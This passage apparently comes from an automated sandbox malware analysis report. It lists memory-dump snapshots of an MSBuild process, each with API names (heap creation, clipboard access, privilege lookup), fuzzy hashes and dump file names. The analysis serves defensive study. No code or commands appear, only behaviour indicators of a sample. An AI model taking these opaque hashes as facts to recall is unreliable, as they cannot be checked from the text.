                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 2efe6c7b42528842a3d4ffe4be7d017dd8c9df0fe378f837d694aefada0f5789
                              • Instruction ID: 047a67cf53dc02191cda92e8cde33a0810b7ad7a3e3461d5f54ddc22171b79ab
                              • Opcode Fuzzy Hash: 2efe6c7b42528842a3d4ffe4be7d017dd8c9df0fe378f837d694aefada0f5789
                              • Instruction Fuzzy Hash: 474198B8D112589FCF00CFA9D584A9EFBF1AB09310F24902AE818B7310D375A901CF64
                              APIs
                              • RtlCreateHeap.NTDLL(00000000,00000000,00000000,00000000,?,?), ref: 0128E8EF
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: d89f5f162d95818f5ef35a85bf63b11c7a14e85690797c5de3678da177ace1de
                              • Instruction ID: 46988eefa98e47357cc340efa232655fff0fc0240facfd9b013df60d9acc9d30
                              • Opcode Fuzzy Hash: d89f5f162d95818f5ef35a85bf63b11c7a14e85690797c5de3678da177ace1de
                              • Instruction Fuzzy Hash: 7D4168B9D052589FCF00DFA9D984A9EFBF1BB09310F24902AE918B7310D375A945CF64
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Clipboard
                              • String ID:
                              • API String ID: 220874293-0
                              • Opcode ID: 25c711c7ef141b93c4da36f2c729c28378240c953da0df87c78d7f4bdcc51e59
                              • Instruction ID: 01eee9e6faa887ca0f49471639a32d8cbdd4f11ffd54979eea06f4331216f6ea
                              • Opcode Fuzzy Hash: 25c711c7ef141b93c4da36f2c729c28378240c953da0df87c78d7f4bdcc51e59
                              • Instruction Fuzzy Hash: AD41BBB4D002489FEB14CFE9C584BDEBBF5AF49300F20902AE805AB264DB709885CF95
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: aa0cde2f8e2177c9345a32ced589a75395454e8f6087dd0916ec5d8f5d27bf76
                              • Instruction ID: 873cf5dc002926315d8f9bdefae221e1a0daacd7edb44dec76c3e5d65c0981d6
                              • Opcode Fuzzy Hash: aa0cde2f8e2177c9345a32ced589a75395454e8f6087dd0916ec5d8f5d27bf76
                              • Instruction Fuzzy Hash: 5331A7B8D052589FCB10CFA9D984ADEFBF5AB09310F14906AE818B7310D375A901CFA8
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: f3af4dedf8dbc1b16802c458b801dc3661c4dc96b4bcd881408f0614a2974f25
                              • Instruction ID: a3f20d881a1bbe3a6dc37cba81640fb5104acde3a3dc66af4150a424339f77be
                              • Opcode Fuzzy Hash: f3af4dedf8dbc1b16802c458b801dc3661c4dc96b4bcd881408f0614a2974f25
                              • Instruction Fuzzy Hash: B03187B9D012599FCB10CFA9D985A9EFBF4FB09314F14906AE818B7310D375A941CF68
                              APIs
                              • LookupPrivilegeDisplayNameW.ADVAPI32(00000000,?,00000000), ref: 05DE2FE4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID: DisplayLookupNamePrivilege
                              • String ID:
                              • API String ID: 1481351451-0
                              • Opcode ID: 8b828e33f80096abda57cfedda8b294e63a28a1f70c090275740aa110432064f
                              • Instruction ID: ecfa07522347b7bf9a53b755a12939b340091a8634162f6add5931974ef534d1
                              • Opcode Fuzzy Hash: 8b828e33f80096abda57cfedda8b294e63a28a1f70c090275740aa110432064f
                              • Instruction Fuzzy Hash: 9F01B5763007049BD710DF65E840A6BBBEAEFD82617048A2AE549CB344DB31D9058BA4
                              APIs
                              • LookupPrivilegeDisplayNameW.ADVAPI32(?,?,00000000), ref: 05DEE048
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID: DisplayLookupNamePrivilege
                              • String ID:
                              • API String ID: 1481351451-0
                              • Opcode ID: 02c3f9a662f12cd08daa0a2db6d0627801f208ba455ab9f624d50cf52352a386
                              • Instruction ID: 066420db763213888338d462ad00e81692859d1486da4b5194f83ca1f7b7f206
                              • Opcode Fuzzy Hash: 02c3f9a662f12cd08daa0a2db6d0627801f208ba455ab9f624d50cf52352a386
                              • Instruction Fuzzy Hash: CEF0A4327042146B5B11EA59EC40D7FBBEEFBC8221714442BE509C3200DA31A8059760
                              APIs
                              • LookupPrivilegeDisplayNameW.ADVAPI32(?,?,00000000), ref: 05DE4B19
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID: DisplayLookupNamePrivilege
                              • String ID:
                              • API String ID: 1481351451-0
                              • Opcode ID: 6e466a40d74b4eeeab82792dcc4a20adbd07054d97f4b58533717c8963fd38c1
                              • Instruction ID: 89c6182b515408386ab0d42051a0ab40aa756a4dca2fc33c2e8803c8ac4e5558
                              • Opcode Fuzzy Hash: 6e466a40d74b4eeeab82792dcc4a20adbd07054d97f4b58533717c8963fd38c1
                              • Instruction Fuzzy Hash: 16F08C323042196B9B14EA9AAC40DBFBBAEFF88260714842BE509C3300DA7198159764
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861683324.0000000006660000.00000040.00000020.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6660000_MSBuild.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: f0979686ee62d197f9d4399378201c3f5ef98dbfe5a61c80fd7264db2c6230b4
                              • Instruction ID: e0d320c028ae2d32787dc443441960bf594e410181baed14dc84b03687960fb1
                              • Opcode Fuzzy Hash: f0979686ee62d197f9d4399378201c3f5ef98dbfe5a61c80fd7264db2c6230b4
                              • Instruction Fuzzy Hash: BBD0A7318189480FE7D5B13C251A3203AE1D7A9115F2546CBD899C35D7E8188C458383
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31aa1d677a7cac97b6ab4edc4057ef93178de9411b74a3ee5cab82afaca329e0
                              • Instruction ID: a13741fcf59071fafafec77d26484f1fb790b43850aafd423f1dd3410901727c
                              • Opcode Fuzzy Hash: 31aa1d677a7cac97b6ab4edc4057ef93178de9411b74a3ee5cab82afaca329e0
                              • Instruction Fuzzy Hash: 782139353101108FD708DF3AD888D6A7BEAEFC9A6471641A9EA46CB371DF30DC018BA0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815186838.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_121d000_MSBuild.jbxd
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb669055142085773027e09a5d338183d92efbe665d3d9376aa1cef7d071219a
                              • Instruction ID: ade1d4d1b1fcee9e86ac96a5143b04d4faa0353837d2ed58526d9400767eec4a
                              • Opcode Fuzzy Hash: eb669055142085773027e09a5d338183d92efbe665d3d9376aa1cef7d071219a
                              • Instruction Fuzzy Hash: 0CC09230501244CFCB0ACF30C068804BB72BF5230676940D8D0098B532C73ADC82CB00